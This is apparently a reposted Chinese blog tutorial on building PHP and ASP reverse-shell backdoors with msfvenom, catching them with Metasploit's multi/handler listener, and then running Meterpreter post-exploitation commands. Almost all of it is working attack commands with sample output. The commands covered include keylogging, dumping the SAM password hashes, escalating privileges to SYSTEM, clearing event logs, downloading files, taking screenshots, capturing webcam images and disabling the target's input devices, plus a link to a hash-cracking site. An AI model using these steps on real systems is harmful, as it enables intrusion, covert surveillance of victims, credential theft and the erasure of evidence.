• msf建立php反弹shell


    一   建立反弹后门

    msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php

    注:生成的反弹木马存放在当前用户home目录下;

    将生成的木马上传到目标机中,可以远程访问;

    windows下asp反弹木马:

    root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.131 -f asp > shell.asp

    二 监听端口建立会话

    1 使用handler模块

    msf > use exploit/multi/handler

    2 设置payload

    msf exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp(当时windows时php换成windows)

    PAYLOAD =>php/meterpreter/reverse_tcp

    3 设置监听主机

    msfexploit(multi/handler) > set LHOST 192.168.88.155

    LHOST =>192.168.88.155

    4 设置监听端口(默认4444)

    msfexploit(multi/handler) > set LPORT 4444

    LPORT => 4444

    5 发动攻击

    msfexploit(multi/handler) > exploit

    注:要远程访问你上传的后门文件

    meterpreter > keyscan_start

    keyscan_dump // 查看键盘记录

    监控目标系统键盘输入,停止监控为keyscan_stop

    meterpreter > migrate

    将你的Meterpreter移到另一个进程

    先用PS命令查看进程后,得到进程ID,然后在执行Migrate (进程ID)

    meterpreter > getuid

    获取用户的服务器运行

    meterpreter > shell

    进入目标电脑,命令提示符

    meterpreter > Idletime

    目标电脑闲置了多长时间

    meterpreter > Hashdump

    导出对方SAM数据库里的内容,推荐一个hash破解网站:

    http://www.objectif-securite.ch/products.php

    meterpreter > getsystem

    利用已自漏洞,自动提权为SYSTEM

    meterpreter > clearev

    清除事件日志

     meterpreter > execute(某Windows指令)

    在对方电脑上运行该指令

    meterpreter > execute 
    Usage: execute -f file [options]
     

    meterpreter > download(文件路径)

    下载文件命令

    例如下载C盘下面的jzking121.txt文件

    meterpreter > download c:\jzking121.txt

    [*] downloading: c:jzking121.txt -> jzking121.txt

    [*] downloaded : c:jzking121.txt -> jzking121.txt

    注意,文件路径中要有两个\

    Upload指令跟Download指令类似!

     meterpreter > shutdown 

    关闭目标计算机,reboot为重启计算机

    meterpreter >screenshot

    获取目标电脑,屏幕截图

     meterpreter > uictl enable keyboard 启用目标使用键盘

    meterpreter > uictl disable mouse   禁止目标使用鼠标

    enable 为启用

    disable 禁用

     meterpreter > webcam_list

    目标系统的摄像头列表

     meterpreter > webcam_snap

    从指定的摄像头,拍摄照片

     meterpreter > search -d c:\ -f 1.jpg

    搜索目标电脑,C盘1.jpg文件
    ————————————————

    转载自msdn,原文链接:https://blog.csdn.net/u012991692/article/details/80784258

  • 相关阅读:
    三步堵死SQL注入漏洞
    现在与大家探讨安全
    如何在SQL注入时保护数据库
    SQL注入与ASP木马上传
    C# 检查字符串,防SQL注入攻击
    关于对SQL注入80004005 及其它错误消息分析
    SQL注入入侵动网SQL版论坛
    天晨设计整站SQL注入漏洞
    用vbs来写sql注入等80端口的攻击脚本
    利用SQL注入2分钟入侵网站全程实录
  • 原文地址:https://www.cnblogs.com/ly584521/p/12330746.html
Copyright © 2020-2023  润新知